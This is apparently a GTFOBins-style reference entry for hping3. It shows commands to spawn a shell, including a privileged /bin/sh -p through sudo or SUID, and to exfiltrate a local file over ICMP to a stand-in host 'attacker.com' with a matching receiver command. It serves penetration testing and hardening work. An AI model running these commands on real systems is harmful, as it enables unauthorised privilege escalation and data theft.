.. / hping3

Sponsor

Fork

Star

Sponsor

Fork

Star

• Shell
• Upload

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  hping3
  /bin/sh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  hping3
  /bin/sh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  hping3
  /bin/sh -p

Upload

This executable can upload local data.

• Comment

  The file is continuously sent as ICMP packets (e.g., of 999 bytes), the optional --end parameter signals when the file reached the end.

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  hping3 attacker.com --icmp --data 999 --sign xxx --file /path/to/input-file

  Receiver

  The same program can be used on the attacker box to receive the data.

  hping3 --icmp --listen xxx --dump

Source | History